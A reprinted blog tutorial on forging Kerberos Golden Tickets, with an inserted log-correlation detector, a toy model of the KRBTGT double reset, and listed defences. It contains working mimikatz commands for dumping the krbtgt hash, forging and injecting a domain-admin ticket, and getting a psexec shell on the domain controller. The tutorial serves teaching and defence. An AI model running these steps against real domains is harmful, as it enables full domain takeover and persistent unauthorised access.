Forging Golden Tickets (reprint)

The first question: how do I prove that I am user XXX? This is the responsibility of the Authentication Server (AS).

The second question: how does the Server know that you are allowed to use the service it provides? When a Client accesses a service on a Server, how does the Server decide whether the Client is authorized to use that service on its host? This is the responsibility of the Ticket Granting Server (TGS).

The first problem Kerberos has to solve is proving that you really are user XXX. An attacker's idea is to forge the identity document itself, the TGT ticket, which gives one attack against Kerberos authentication: the forged Golden Ticket (a forged TGT).

A Golden Ticket is a forged TGT (Ticket Granting Ticket). With a single high-privilege TGT, the holder can present it to the TGS and exchange it for a service ticket for any service, so forging a Golden Ticket amounts to forging the highest privilege in the domain.

A high-privilege TGT contains a PAC, and the PAC contains the Client's SID and the groups the Client belongs to; forging a domain administrator account therefore yields domain administrator privileges.

Pass-the-ticket (PTT): logging on to a machine by passing a Kerberos ticket.


Forging the Golden Ticket

Because a Golden Ticket is a forged TGT, there is no AS-REQ/AS-REP exchange with the domain controller (steps 1 and 2): the attacker goes straight to step 3 of authentication and sends a TGS-REQ to the domain controller to obtain a service ticket (TGS).


Requirements for producing a Golden Ticket:

1. The domain name
2. The domain SID # take the SID shown by whoami /user and remove the last dash and the digits after it (the RID); what remains is the domain SID
3. The NTLM hash of the domain's KRBTGT account
4. A user name to forge; the user name can be anything
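Two facts above give a defender something to look for: a forged TGT never goes through the AS-REQ/AS-REP exchange, and the user name in it can be anything, even one that does not exist in the directory. The following is an added example, not code from the original post: it correlates constructed Windows Security event records from a domain controller and flags service-ticket requests (event ID 4769) that have no matching TGT issuance (event ID 4768), plus requests naming unknown accounts. The event IDs 4768 and 4769 are real Windows event IDs; the records, account names, IP addresses and the directory snapshot are constructed for this example.

```python
"""
Added example, not code from the original post: flag service-ticket requests
(event ID 4769) with no matching TGT issuance (event ID 4768), and requests
naming accounts that do not exist in the directory. Event IDs 4768 and 4769
are real Windows event IDs; the records, account names, IPs and directory
snapshot below are constructed for this example.
"""
from collections import namedtuple

Event = namedtuple("Event", "ts event_id account source_ip")

# Constructed directory snapshot: accounts that really exist in the domain.
KNOWN_ACCOUNTS = {"alice", "bob", "administrator", "svc_backup"}

# Constructed DC events, ts in seconds. In production these come from the
# 4768/4769 records of every domain controller, not just one.
SAMPLE_EVENTS = [
    Event(100, 4768, "alice", "10.0.0.5"),           # alice gets a TGT (AS-REQ/AS-REP)
    Event(105, 4769, "alice", "10.0.0.5"),           # then a service ticket: normal
    Event(200, 4769, "administrator", "10.0.0.77"),  # service ticket, but no TGT was issued
    Event(210, 4769, "ghostuser", "10.0.0.77"),      # account does not exist at all
    Event(300, 4768, "bob", "10.0.0.6"),
    Event(50000, 4769, "bob", "10.0.0.6"),           # TGT seen, but older than a TGT lifetime
]

TGT_LIFETIME_SECONDS = 10 * 3600  # default maximum TGT lifetime is 10 hours


def find_suspicious(events, known_accounts=KNOWN_ACCOUNTS,
                    tgt_lifetime=TGT_LIFETIME_SECONDS):
    """Return (account, source_ip, reason) tuples for suspicious 4769 events.

    A 4769 is suspicious when the same account from the same source IP has no
    4768 within one TGT lifetime before it, or when the account is unknown.
    """
    known = {a.lower() for a in known_accounts}
    last_tgt = {}   # (account, source_ip) -> ts of the most recent 4768
    findings = []
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.account.lower(), ev.source_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.ts
        elif ev.event_id == 4769:
            if ev.account.lower() not in known:
                findings.append((ev.account, ev.source_ip, "account not in directory"))
            tgt_ts = last_tgt.get(key)
            if tgt_ts is None or ev.ts - tgt_ts > tgt_lifetime:
                findings.append((ev.account, ev.source_ip,
                                 "service ticket without prior TGT issuance"))
    return findings


if __name__ == "__main__":
    for account, ip, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{account}@{ip}: {reason}")
```

Two caveats when running this against real logs: a client may obtain its TGT from one domain controller and its service tickets from another, so the 4768 and 4769 streams of all domain controllers must be merged before correlating; and a client that renews its TGT (event ID 4770) can keep requesting service tickets long after the original 4768, so the lifetime window should follow the domain's actual TGT renewal policy rather than the 10-hour default used here.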

Step 1: obtain the krbtgt hash

Use the mimikatz command lsadump::dcsync /domain:superman.com /user:krbtgt to obtain the hash of krbtgt.


Step 2: forge the ticket

Using mimikatz's kerberos::golden generation function with the krbtgt hash produces the golden ticket golden.kiribi, i.e. the TGT has been forged successfully:
mimikatz # kerberos::golden /admin:administrator /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /krbtgt:5bba52548e7171b4529f93f758ef66e8 /ticket:golden.kiribi

Step 3: obtain the privileges

Clear the local ticket cache, then import the forged ticket:
kerberos::list # view the tickets saved locally and note the client name
kerberos::purge # clear the local ticket cache
kerberos::ptt golden.kiribi # import the forged golden ticket
kerberos::list # view the tickets saved locally and check whether the client name has become the user name in our ticket


Step 4: use the forged Golden Ticket

Use the psexec tool: psexec.exe \\<domain controller computer name> cmd.exe
This returns a cmd shell; whoami shows the user as the administrator we forged.
Golden Ticket usage scenario: starting from a shell running as a domain-admin user, obtain the krbtgt NTLM hash and the domain SID; after that the privileges of any user can be forged.

Defensive measures:

1. Restrict domain administrators from logging on to any computer other than the domain controllers and a small number of management servers. This reduces the attacker's opportunities to obtain domain administrator credentials and, with them, access to ntds.dit, the Active Directory database on the domain controller. If the attacker cannot reach the AD database (the ntds.dit file), they cannot obtain the KRBTGT account password.

2. Change the KRBTGT password regularly. Change it once, let AD back it up, then change it again after 12-24 hours. This process should have no effect on the environment. It should be standard practice to ensure the KRBTGT password is changed at least once a year.

3. Once an attacker has obtained the KRBTGT account's password hash, they can create Golden Tickets at will. Changing the KRBTGT password twice in quick succession invalidates every existing Golden Ticket (and every other active Kerberos ticket). This makes all Kerberos tickets invalid and removes the attacker's ability to create working Golden Tickets with the KRBTGT hash they hold.

The third defensive measure is explained as follows:

Old password: two machines are logged on with it.
New password 1: now new password 1 exists. Later logons use new password 1, but the sessions that logged on with the old password are not disconnected.
New password 2: now new password 2 exists. Later logons use new password 2, but users who logged on with new password 1 are not disconnected.
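The sequence above works because the KDC keeps the current KRBTGT key and the previous one and accepts a TGT encrypted under either, which is why a single reset is not enough. The following is an added example, not code from the original post: a toy model of that current/previous-key rule, walking through old password, new password 1 and new password 2. Everything in it is constructed: the key values are placeholders and an HMAC tag stands in for the real ticket encryption; it models only the acceptance rule described in the text, not the Kerberos protocol itself.

```python
"""
Added example, not code from the original post: a toy model of why the KRBTGT
password must be changed twice. The KDC keeps the current KRBTGT key and the
previous one and accepts a TGT minted under either, so one reset leaves a
ticket minted with the leaked key valid. The key values are placeholders and
an HMAC tag stands in for the real ticket encryption.
"""
import hashlib
import hmac


def tag_for(key: bytes, client: str) -> bytes:
    """Stand-in for encrypting the TGT under the KRBTGT key."""
    return hmac.new(key, client.encode(), hashlib.sha256).digest()


def make_tgt(key: bytes, client: str):
    """A TGT is modelled as (client name, tag under the key used to mint it)."""
    return (client, tag_for(key, client))


class ToyKdc:
    """Keeps the current and the previous KRBTGT key, like the real KDC."""

    def __init__(self, initial_key: bytes):
        self.current_key = initial_key
        self.previous_key = None

    def reset_krbtgt(self, new_key: bytes) -> None:
        """A password reset: the current key becomes the previous key."""
        self.previous_key = self.current_key
        self.current_key = new_key

    def issue_tgt(self, client: str):
        """A normal logon: the TGT is minted under the current key."""
        return make_tgt(self.current_key, client)

    def accepts(self, tgt) -> bool:
        """The KDC accepts a TGT minted under the current or the previous key."""
        client, tag = tgt
        for key in (self.current_key, self.previous_key):
            if key is not None and hmac.compare_digest(tag, tag_for(key, client)):
                return True
        return False


def simulate() -> dict:
    """Walk through old password / new password 1 / new password 2."""
    kdc = ToyKdc(b"krbtgt-key-old")              # placeholder key
    leaked_key = kdc.current_key                 # the hash the attacker obtained
    forged = make_tgt(leaked_key, "administrator")
    results = {"forged_before_any_reset": kdc.accepts(forged)}

    kdc.reset_krbtgt(b"krbtgt-key-new1")         # new password 1
    alice_tgt = kdc.issue_tgt("alice")           # a user logs on under new password 1
    results["forged_after_one_reset"] = kdc.accepts(forged)

    kdc.reset_krbtgt(b"krbtgt-key-new2")         # new password 2
    results["forged_after_two_resets"] = kdc.accepts(forged)
    results["alice_after_two_resets"] = kdc.accepts(alice_tgt)  # not disconnected
    return results


if __name__ == "__main__":
    for name, ok in simulate().items():
        print(f"{name}: {'accepted' if ok else 'rejected'}")
```

Running it shows the forged ticket still accepted after the first reset and rejected after the second, while alice's ticket from the first reset survives the second one, matching the "not disconnected" behaviour above. The 12-24 hour gap between the two resets in measure 2 is what lets replication finish so that legitimate sessions are not cut off.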

Summary

1. Forging a Golden Ticket requires knowing the NTLM hash of the krbtgt account
2. A Golden Ticket can maintain elevated privileges
3. Importing a Golden Ticket with mimikatz on Windows Server 2003 and earlier produces an error

Author: I want to become Superman

Reprinted from: https://www.cnblogs.com/sup3rman/p/12329474.html
